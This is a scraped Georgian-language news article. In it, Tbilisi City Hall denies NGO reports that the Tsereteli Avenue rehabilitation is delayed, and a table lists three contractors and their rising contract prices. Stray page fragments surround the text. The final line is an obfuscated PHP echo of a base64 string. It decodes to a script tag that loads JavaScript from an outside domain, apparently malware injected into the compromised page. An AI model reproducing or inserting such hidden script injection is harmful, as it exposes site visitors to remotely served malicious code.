celsiusi
ავერსი შნაიდერი

წერეთლის გამზირის რეაბილიტაცია 2024 წლის იანვარში დასრულდება - ამის შესახებ განცხადებას თბილისის მერია ავრცელებს. დედაქალაქის მთავრობის განცხადებით, სიმართლეს არ შეესაბამება არასამთავრობო ორგანიზაციის "ფლანგვის დეტექტორის" და მოძრაობა "ჩემი ქალაქი მკლავს" გამოქვეყნებული ინფორმაცია, თითქოს გამზირის რეაბილიტაციამ სამი თვით გადაიწია.

"აღნიშნული ინფორმაცია არის სრული სიცრუე, რაც ემსახურება თბილისის მუნიციპალიტეტის დისკრედიტაციას და საზოგადოების შეცდომაში შეყვანას.

თბილისის მერიას არ შეუცვლია პროექტის განხორციელების ვადები, წერეთლის გამზირის რეაბილიტაცია დასრულდება წინასწარ განსაზღვრულ დროს - 2024 წლის იანვრის ბოლოს.

მოვუწოდებთ მედიის წარმომადგენლებს, ნუ ენდობიან ყალბ ინფორმაციებს და თბილისის მუნიციპალიტეტის შესახებ გავრცელებული ნებისმიერი ინფორმაცია გადაამოწმონ თბილისის მერიის პრესსამსახურთან,"- ნათქვამია მერიის პრესსამსახურის მიერ გავრცელებულ ინფორმაციაში.

წერეთლის გამზირის რეაბილიტაცია სამ ლოტად იყო. პროექტის ორ ლოტს ერთი კონტრაქტორი - შპს "მილენიუმ ბილდერს გრუპი" აშენებს, ხოლო ერთი ლოტის შემსრულებელი კომპანია "ერ ტე დე" არის.

კომპანიებთან გაფორმებულ ხელშეკრულებებში ცვლილებები რამდენჯერმე შევიდა და მისი ღირებულება 2,8 მილიონი ლარით გაიზარდა.

კონტრაქტორი თავდაპირველი საფასური (₾) საბოლოო საფასური (₾) პროექტის აღწერა
შპს მილენიუმ ბილდერს გრუპ 8,365,457 9,201,870 აკაკი წერეთლის გამზირის (სამტრედიის ქუჩიდან დიდუბის ხიდამდე) მონაკვეთის სარეაბილიტაციო სამუშაოების შესყიდვა.
შპს მილენიუმ ბილდერს გრუპ 11,844,540 13,028,880 აკაკი წერეთლის გამზირის (გვეტაძის ქუჩიდან სამტრედიის ქუჩამდე) მონაკვეთის სარეაბილიტაციო სამუშაოების შესყიდვა.
შპს ერ ტე დე 8,198,293 9,017,950 აკაკი წერეთლის გამზირის (ცაბაძის ქუჩიდან გვეტაძის ქუჩამდე) მონაკვეთის სარეაბილიტაციო სამუშაოების შესყიდვა.
სრული ღირებულება 28,408,291 31,248,700
381
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");